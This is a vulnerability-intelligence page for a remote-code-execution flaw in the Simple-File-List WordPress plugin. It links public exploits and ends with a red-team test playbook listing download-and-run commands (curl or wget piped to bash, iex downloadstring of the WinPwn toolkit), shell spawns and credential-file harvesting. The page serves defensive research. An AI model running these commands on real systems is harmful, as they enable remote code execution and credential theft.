CVE-2020-36847
Overview
This vulnerability is a Remote Code Execution (RCE) flaw caused by improper validation of file rename operations within the Simple-File-List WordPress plugin. Specifically, the rename function fails to restrict changing file extensions, enabling malicious manipulation of uploaded files. The affected component is the file renaming feature in versions up to and including 4.2.2 of the plugin.
Vulnerability Description
The Simple-File-List Plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 4.2.2 via the rename function which can be used to rename uploaded PHP code with a png extension to use a php extension. This allows unauthenticated attackers to execute code on the server.
Impact
An unauthenticated attacker can exploit this vulnerability to execute arbitrary code on the web server hosting the WordPress site, leading to full system compromise. No user interaction or privileges are required (CVSS vector AV:N/AC:L/PR:N/UI:N). This can result in data theft, server control, or further network pivoting, severely impacting business operations and data confidentiality.
Solution
Users should upgrade the Simple-File-List WordPress plugin to version 4.2.3 or later where the rename function has been secured to prevent extension manipulation, as detailed in the WordPress plugin changelog (https://plugins.trac.wordpress.org/changeset/2286920/simple-file-list) and Wordfence advisory. Administrators should apply this update promptly to mitigate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the Simple-File-List Plugin for WordPress is characterized by a critical flaw in its rename function, which allows for remote code execution. This vulnerability arises from the improper handling of file uploads, specifically when users can upload files with a .png extension. The underlying issue is that the plugin does not adequately validate the file type, enabling an attacker to upload malicious PHP code disguised as an image file. Once the file is renamed to have a .php extension, it can be executed on the server, leading to unauthorized access and control over the affected system.
Attack vectors associated with this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. An unauthenticated attacker can leverage the plugin's functionality to upload a crafted file without needing any form of authentication. This means that even individuals with no legitimate access to the WordPress site can potentially execute arbitrary code on the server. Exploitation scenarios may include the deployment of web shells, which provide attackers with a persistent backdoor, or the execution of other malicious scripts that can manipulate data, steal sensitive information, or disrupt services. The simplicity of the attack process, combined with the high impact of successful exploitation, makes this vulnerability especially dangerous.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on WordPress for their online presence. Successful exploitation can lead to severe business risks, including data breaches, loss of customer trust, and potential legal ramifications. An attacker gaining control over the server can manipulate or exfiltrate sensitive data, deface websites, or use the compromised server as a launchpad for further attacks against other systems. The financial implications can also be substantial, as organizations may face costs related to incident response, recovery, and potential regulatory fines. Furthermore, the reputational damage associated with a security breach can have long-lasting effects on customer relationships and brand integrity.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. Regularly updating the Simple-File-List Plugin to the latest version is crucial, as updates often include patches for known vulnerabilities. Additionally, employing web application firewalls (WAFs) can help filter out malicious requests before they reach the server. Monitoring file uploads and implementing strict file type validation can further reduce the risk of unauthorized file execution. Organizations should also conduct regular security audits and penetration testing to identify and remediate vulnerabilities proactively. Educating users about secure file handling practices and the importance of maintaining updated plugins can also play a vital role in mitigating risks.
In conclusion, the vulnerability in the Simple-File-List Plugin for WordPress exemplifies the critical need for robust security measures in web applications. The ability for unauthenticated attackers to execute arbitrary code poses a significant threat to the integrity and security of affected systems. By understanding the technical details of the vulnerability, recognizing potential attack vectors, and implementing effective detection and mitigation strategies, organizations can better protect themselves against the risks associated with this and similar vulnerabilities. The evolving landscape of cybersecurity necessitates a proactive approach to vulnerability management, ensuring that organizations remain resilient against emerging threats.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Simplefilelist | Simple File List | All |
cpe:2.3:a:simplefilelist:simple_file_list:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
WordPress Simple File List Unauthenticated Remote Code Execution
exploits/multi/http/wp_simple_file_list_rce
|
coiffeur, h00die | Unknown | php | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Simple File List WordPress Plugin 4.2.2 - File Upload to RCE | Md Amanat Ullah (xSwads) | webapps | multiple | - | View |
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
ftz7/PoC-CVE-2020-36847-WordPress-Plugin-4.2.2-RCE
Este repositório contém um script de prova de conceito (PoC) que demonstra uma vulnerabilidade crítica encontrada no plu...
|
ftz7 | 1 | 0 | 2025-08-23 | View |
Threat Feed
2 eventsProof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
35%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-36847 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/9eb835fd-6ebf-4162-856c-0366b663a07e?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/2286920/simple-file-list |
| packetstormsecurity.com |
GitHub CVE
|
https://packetstormsecurity.com/files/160221/ |
| cybersecurity-help.cz |
GitHub CVE
|
https://www.cybersecurity-help.cz/vdb/SB2020042711 |
| wpscan.com |
GitHub CVE
|
https://wpscan.com/vulnerability/365da9c5-a8d0-45f6-863c-1b1926ffd574/ |